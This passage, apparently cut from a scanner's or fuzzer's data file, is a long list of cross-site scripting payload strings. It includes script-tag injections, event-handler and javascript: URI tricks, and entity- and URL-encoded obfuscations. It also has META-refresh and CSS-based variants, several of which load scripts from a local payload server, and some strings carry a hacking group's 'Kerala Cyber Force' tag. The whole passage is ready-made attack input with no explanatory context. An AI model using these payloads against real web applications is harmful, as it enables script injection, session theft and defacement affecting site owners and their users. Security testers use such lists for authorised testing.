=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<TABLE><TD BACKGROUND="javascript:alert(1)">', '"><TABLE><TD BACKGROUND="javascript:alert(1)">', '\'><TABLE><TD BACKGROUND="javascript:alert(1)">', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/gif.gif\' onload=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"\'>', '<img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', '\'><img src=\'http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif\' onerror=\'document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"\'>', "<img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>", '"><img src=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\' onload=alert(1)//></img>', "'><img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>", '<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '"><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', "'><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>", '</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>', '<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', '"><img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', "'><img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>', '"><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>', "'><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>", '<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>', '"><img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>', "'><img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>", '?><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '?><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '<ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '"><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', "'><ScRIPt>prompt(1)</ScRIPt>", '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '<ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', '"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', "'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>", '?><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '"><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', "'><ScRIPt>prompt(1)</ScRIPt>", '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '?><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', '"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', "'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>", '?><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '"><ScRIPt>prompt(1)</ScRIPt>', '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', "'><ScRIPt>prompt(1)</ScRIPt>", '</ScrIpt><ScRIPt>prompt(1)</ScRIPt>', '?><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', '"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>', "'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>", '</script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"></script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', "'></script><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '</script><script>alert(String.fromCharCode(75,67,70))</script>', '"></script><script>alert(String.fromCharCode(75,67,70))</script>', "'></script><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '?/><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?/><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '?/><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?/><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '</SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>', '"></SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>', "'></SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>", '</SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))', '"></SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))', "'></SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))", '</SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>', '"></SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>', "'></SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>", '</SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', '"></SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', "'></SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>", '%27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E', '%22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E', '%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', '%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', '%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%33%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35%25%32%35%25%33%34%25%34%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%36%25%32%35%25%33%33%25%34%33%25%32%35%25%33%32%25%34%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35', '<h1>X</h1>', '"><h1>X</h1>', "'><h1>X</h1>", '<marquee>Kerala Cyber Force</marquee>', '"><marquee>Kerala Cyber Force</marquee>', "'><marquee>Kerala Cyber Force</marquee>", '<br><br><b><u>X</u></b>', '"><br><br><b><u>X</u></b>', "'><br><br><b><u>X</u></b>", '<script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '</ScrIpt><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '"><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '</ScrIpt><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '\'><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '</ScrIpt><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '<script>alert%281%29</script>', '</ScrIpt><script>alert%281%29</script>', '"><script>alert%281%29</script>', '</ScrIpt><script>alert%281%29</script>', "'><script>alert%281%29</script>", '</ScrIpt><script>alert%281%29</script>', '<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>/', '</ScrIpt><script>alert(1)</script>/', '"><script>alert(1)</script>/', '</ScrIpt><script>alert(1)</script>/', "'><script>alert(1)</script>/", '</ScrIpt><script>alert(1)</script>/', '<script%20language=vbscript>msgbox%20X</script>', '"><script%20language=vbscript>msgbox%20X</script>', "'><script%20language=vbscript>msgbox%20X</script>", '></title><script>alert(X)</script>\'"><marquee><h1>Kerala Cyber Force</h1></marquee>', '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '?;!?<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}', '!?<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}', '<img src="blah"onmouseover="alert(1);">', '"><img src="blah"onmouseover="alert(1);">', '\'><img src="blah"onmouseover="alert(1);">', '<img src="blah>" onmouseover="alert(1);">', '"><img src="blah>" onmouseover="alert(1);">', '\'><img src="blah>" onmouseover="alert(1);">', '<IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);">', '"><IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);">', '\'><IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);">', '<IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);"', '<IMG SRC=javascript:alert(1)>', '"><IMG SRC=javascript:alert(1)>', "'><IMG SRC=javascript:alert(1)>", '<IMG SRC=JaVaScRiPt:alert(1)>', '"><IMG SRC=JaVaScRiPt:alert(1)>', "'><IMG SRC=JaVaScRiPt:alert(1)>", '</TITLE><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"></TITLE><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'></TITLE><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '<IMG SRC=javascript:alert(&quot;X&quot;)>', '"><IMG SRC=javascript:alert(&quot;X&quot;)>', "'><IMG SRC=javascript:alert(&quot;X&quot;)>", '<IMG SRC=`javascript:alert("Kerala Cyber Force, \'X\'")`>', '"><IMG SRC=`javascript:alert("Kerala Cyber Force, \'X\'")`>', '\'><IMG SRC=`javascript:alert("Kerala Cyber Force, \'X\'")`>', '<IMG """><SCRIPT>alert(1)</SCRIPT>">', '"><IMG """><SCRIPT>alert(1)</SCRIPT>">', '\'><IMG """><SCRIPT>alert(1)</SCRIPT>">', '<img/src="1"/onerror="alert(1)"', '"><img/src="1"/onerror="alert(1)"', '\'><img/src="1"/onerror="alert(1)"', 'SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', '<IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>', '"><IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>', "'><IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>", '<IMG SRC="jav\tascript:alert(1);">', '"><IMG SRC="jav\tascript:alert(1);">', '\'><IMG SRC="jav\tascript:alert(1);">', '<IMG SRC="jav&#x09;ascript:alert(1);">', '"><IMG SRC="jav&#x09;ascript:alert(1);">', '\'><IMG SRC="jav&#x09;ascript:alert(1);">', '<IMG SRC="jav&#x0A;ascript:alert(1);">', '"><IMG SRC="jav&#x0A;ascript:alert(1);">', '\'><IMG SRC="jav&#x0A;ascript:alert(1);">', '<IMG SRC="jav&#x0D;ascript:alert(1);">', '"><IMG SRC="jav&#x0D;ascript:alert(1);">', '\'><IMG SRC="jav&#x0D;ascript:alert(1);">', '<IMG SRC=" &#14; javascript:alert(1);">', '"><IMG SRC=" &#14; javascript:alert(1);">', '\'><IMG SRC=" &#14; javascript:alert(1);">', '<script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>', '"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>', "'><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>", '<body onload="alert(1);">', '"><body onload="alert(1);">', '\'><body onload="alert(1);">', '<body onload="alert(1)">', '"><body onload="alert(1)">', '\'><body onload="alert(1)">', '<img src="javascript:alert(1)">', '"><img src="javascript:alert(1)">', '\'><img src="javascript:alert(1)">', '<p style="background:url(\'javascript:alert(1)\')">', '"><p style="background:url(\'javascript:alert(1)\')">', '\'><p style="background:url(\'javascript:alert(1)\')">', '\' style=abc:expression(X) \' \\" style=abc:expression(X) \\"', '" type=image src=null onerror=X " \\\' type=image src=null onerror=X \\\'', 'onload=\'X\' \\" onload=\\"X\\"/onload=\\"X\\"/onload=\'X\'/', '\\\'\\"<\\/script><\\/xml><\\/title><\\/textarea><\\/noscript><\\/style><\\/listing><\\/xmp><\\/pre><img src=null onerror=X>', '<<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script', '"><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script', "'><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script", '<<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script', '"><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script', "'><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script", '<img src="x:gif" onerror="window[\'al\\u0065rt\'](1)"></img>', '"><img src="x:gif" onerror="window[\'al\\u0065rt\'](1)"></img>', '\'><img src="x:gif" onerror="window[\'al\\u0065rt\'](1)"></img>', '<img src="x:gif" onerror="eval(\'al\'%2b\'lert(1)\')">', '"><img src="x:gif" onerror="eval(\'al\'%2b\'lert(1)\')">', '\'><img src="x:gif" onerror="eval(\'al\'%2b\'lert(1)\')">', '<img src="x:alert" onerror="eval(src%2b\'(1)\')">', '"><img src="x:alert" onerror="eval(src%2b\'(1)\')">', '\'><img src="x:alert" onerror="eval(src%2b\'(1)\')">', '<img/src="mars.png"alt="mars">', '"><img/src="mars.png"alt="mars">', '\'><img/src="mars.png"alt="mars">', '<object data="javascript:alert(1)">', '"><object data="javascript:alert(1)">', '\'><object data="javascript:alert(1)">', '<isindex type=image src=1 onerror=alert(1)>', '"><isindex type=image src=1 onerror=alert(1)>', "'><isindex type=image src=1 onerror=alert(1)>", '<isindex action=javascript:alert(1) type=image>', '"><isindex action=javascript:alert(1) type=image>', "'><isindex action=javascript:alert(1) type=image>", '<img src=x:alert(alt) onerror=eval(src) alt=0>', '"><img src=x:alert(alt) onerror=eval(src) alt=0>', "'><img src=x:alert(alt) onerror=eval(src) alt=0>", '<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>', '"><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>', '\'><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>', '<img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>', '"><img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>', "'><img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>", '";location=\'javascript:alert(1)\';', '";location=location.hash)//#0={};alert(1)', '";eval(unescape(location))//#%0Aalert(1)', '<b/alt="1"onmouseover=InputBox+1language=vbs>X</b>', '"><b/alt="1"onmouseover=InputBox+1language=vbs>X</b>', '\'><b/alt="1"onmouseover=InputBox+1language=vbs>X</b>', '<b "<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">X</b>', '</a onmousemove="alert(1)">', '"></a onmousemove="alert(1)">', '\'></a onmousemove="alert(1)">', 'data:text/html,<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<img src="x:?" title="onerror=alert(1)//">', '"><img src="x:?" title="onerror=alert(1)//">', '\'><img src="x:?" title="onerror=alert(1)//">', '<img src="x:? title=" onerror=alert(1)//">', '"><img src="x:? title=" onerror=alert(1)//">', '\'><img src="x:? title=" onerror=alert(1)//">', '?script?alert(?X?)?/script?', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '<DIV STYLE="background-image: url(javascript:alert(1))">', '"><DIV STYLE="background-image: url(javascript:alert(1))">', '\'><DIV STYLE="background-image: url(javascript:alert(1))">', '<div style="background-image: url(javascript:alert(1););">', '"><div style="background-image: url(javascript:alert(1););">', '\'><div style="background-image: url(javascript:alert(1););">', '<DIV STYLE="background-image: url(&#1;javascript:alert(1))">', '"><DIV STYLE="background-image: url(&#1;javascript:alert(1))">', '\'><DIV STYLE="background-image: url(&#1;javascript:alert(1))">', '<div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">', '"><div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">', '\'><div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">', '<div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">', '"><div style="binding: 